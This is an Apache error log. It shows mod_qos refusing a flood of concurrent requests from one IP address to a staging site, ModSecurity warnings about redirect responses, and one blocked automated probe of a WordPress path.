[Tue May 26 19:59:55.947930 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz36AAAAAg
[Tue May 26 19:59:55.948102 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz36QAAADs
[Tue May 26 19:59:55.948264 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY4ZZc2DoU1lPnP1VAgAAAJs
[Tue May 26 19:59:55.949531 2026] [qos:error] [pid 106517:tid 106749] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY4ZZc2DoU1lPnP1VAwAAAOc
[Tue May 26 19:59:55.950301 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz36gAAAEU
[Tue May 26 19:59:55.950960 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz37AAAACw
[Tue May 26 19:59:55.951672 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz36wAAAFo
[Tue May 26 19:59:55.952290 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz37QAAAEc
[Tue May 26 19:59:55.953924 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz37gAAACk
[Tue May 26 19:59:55.955609 2026] [qos:error] [pid 106517:tid 106707] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY4ZZc2DoU1lPnP1VBQAAAL0
[Tue May 26 19:59:56.205923 2026] [qos:error] [pid 106517:tid 106691] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZIZZc2DoU1lPnP1VCwAAAK0
[Tue May 26 19:59:56.206852 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz39wAAAFU
[Tue May 26 19:59:56.209686 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz3-AAAAD8
[Tue May 26 19:59:56.211948 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz3-QAAAD0
[Tue May 26 19:59:56.214703 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz3-gAAAHc
[Tue May 26 19:59:56.214754 2026] [qos:error] [pid 106517:tid 106667] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuZIZZc2DoU1lPnP1VDgAAAJY
[Tue May 26 19:59:56.217491 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz3-wAAAD4
[Tue May 26 19:59:56.219009 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz3_AAAADg
[Tue May 26 19:59:56.219412 2026] [qos:error] [pid 106517:tid 106682] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZIZZc2DoU1lPnP1VEAAAAKQ
[Tue May 26 19:59:56.243802 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz3_QAAACY
[Tue May 26 19:59:56.274817 2026] [security2:error] [pid 106517:tid 106710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UdQAAAMA"]
[Tue May 26 19:59:56.281157 2026] [security2:error] [pid 106517:tid 106655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UjgAAAIo"]
[Tue May 26 19:59:56.284637 2026] [security2:error] [pid 106517:tid 106738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UdgAAANw"]
[Tue May 26 19:59:56.295826 2026] [security2:error] [pid 106517:tid 106761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UhQAAAPM"]
[Tue May 26 19:59:56.296905 2026] [security2:error] [pid 106517:tid 106771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UeQAAAP0"]
[Tue May 26 19:59:56.301220 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UgQAAAMU"]
[Tue May 26 19:59:56.301286 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UmwAAAKI"]
[Tue May 26 19:59:56.306056 2026] [security2:error] [pid 106517:tid 106662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UggAAAJE"]
[Tue May 26 19:59:56.306402 2026] [security2:error] [pid 106517:tid 106724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UjwAAAM4"]
[Tue May 26 19:59:56.312718 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UnAAAAMk"]
[Tue May 26 19:59:56.316756 2026] [security2:error] [pid 106517:tid 106654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UjAAAAIk"]
[Tue May 26 19:59:56.317578 2026] [security2:error] [pid 106517:tid 106718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UlgAAAMg"]
[Tue May 26 19:59:56.318978 2026] [security2:error] [pid 106517:tid 106676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UiQAAAJ8"]
[Tue May 26 19:59:56.334355 2026] [security2:error] [pid 106517:tid 106772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UmQAAAP4"]
[Tue May 26 19:59:56.339911 2026] [security2:error] [pid 106517:tid 106766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UkAAAAPg"]
[Tue May 26 19:59:56.348937 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UngAAAPE"]
[Tue May 26 19:59:56.349403 2026] [security2:error] [pid 106517:tid 106694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UrAAAALA"]
[Tue May 26 19:59:56.361840 2026] [security2:error] [pid 106517:tid 106651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UrgAAAIY"]
[Tue May 26 19:59:56.370193 2026] [security2:error] [pid 106517:tid 106757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UqQAAAO8"]
[Tue May 26 19:59:56.372380 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3lAAAAAc"]
[Tue May 26 19:59:56.382137 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3lQAAAG4"]
[Tue May 26 19:59:56.392267 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3mAAAAF8"]
[Tue May 26 19:59:56.397911 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3mQAAABw"]
[Tue May 26 19:59:56.404276 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3lgAAAAE"]
[Tue May 26 19:59:56.406869 2026] [security2:error] [pid 106517:tid 106652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY4ZZc2DoU1lPnP1U3QAAAIc"]
[Tue May 26 19:59:56.423413 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3mgAAACE"]
[Tue May 26 19:59:56.429706 2026] [security2:error] [pid 106517:tid 106736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UqwAAANo"]
[Tue May 26 19:59:56.434240 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY4ZZc2DoU1lPnP1U6AAAAMo"]
[Tue May 26 19:59:56.440784 2026] [security2:error] [pid 93576:tid 93766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3kwAAADY"]
[Tue May 26 19:59:56.452873 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3jQAAAHU"]
[Tue May 26 19:59:56.453195 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY4ZZc2DoU1lPnP1U5wAAALk"]
[Tue May 26 19:59:56.461008 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3pgAAABE"]
[Tue May 26 19:59:56.464762 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3twAAACI"]
[Tue May 26 19:59:56.472881 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3zQAAACs"]
[Tue May 26 19:59:56.583257 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4NwAAAC8
[Tue May 26 19:59:56.584335 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4OAAAABg
[Tue May 26 19:59:56.587520 2026] [qos:error] [pid 106517:tid 106708] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuZIZZc2DoU1lPnP1VUwAAAL4
[Tue May 26 19:59:56.595866 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4OgAAAHU
[Tue May 26 19:59:56.605905 2026] [qos:error] [pid 106517:tid 106694] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZIZZc2DoU1lPnP1VVgAAALA
[Tue May 26 19:59:56.608687 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4OwAAAAo
[Tue May 26 19:59:56.611989 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4PAAAAGU
[Tue May 26 19:59:56.621434 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4PQAAABM
[Tue May 26 19:59:56.631238 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4PgAAABE
[Tue May 26 19:59:56.731846 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4PwAAAFM
[Tue May 26 19:59:56.737517 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4QQAAAEI
[Tue May 26 19:59:56.741742 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4QgAAAAc
[Tue May 26 19:59:56.747263 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4QwAAACI
[Tue May 26 19:59:56.759342 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4RAAAABo
[Tue May 26 19:59:56.762182 2026] [qos:error] [pid 106517:tid 106735] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZIZZc2DoU1lPnP1VXQAAANk
[Tue May 26 19:59:56.763363 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4RQAAAB0
[Tue May 26 19:59:56.777246 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4SAAAACs
[Tue May 26 19:59:56.784876 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZGDRMqfxdEDkosz4SQAAAFU
[Tue May 26 19:59:56.792128 2026] [qos:error] [pid 106517:tid 106776] [client 45.148.10.120:54226] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZIZZc2DoU1lPnP1VXwAAAQI
[Tue May 26 19:59:57.268527 2026] [security2:error] [pid 93576:tid 93725] [client 103.163.220.42:40047] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/edit-tags.php"] [unique_id "ahWuZWDRMqfxdEDkosz4VQAAAA0"]
[Tue May 26 19:59:57.281215 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3rQAAAFg"]
[Tue May 26 19:59:57.290708 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3swAAAEw"]
[Tue May 26 19:59:57.291006 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3jwAAAAU"]
[Tue May 26 19:59:57.296809 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3zwAAAF0"]
[Tue May 26 19:59:57.300112 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3yQAAACg"]
[Tue May 26 19:59:57.302956 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz31AAAADM"]
[Tue May 26 19:59:57.303496 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3tAAAAAM"]
[Tue May 26 19:59:57.311686 2026] [security2:error] [pid 106517:tid 106730] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VYQAAANQ"]
[Tue May 26 19:59:57.314090 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3pwAAAHg"]
[Tue May 26 19:59:57.317065 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz32AAAACo"]
[Tue May 26 19:59:57.329887 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz31gAAAAQ"]
[Tue May 26 19:59:57.342531 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VJgAAAJM"]
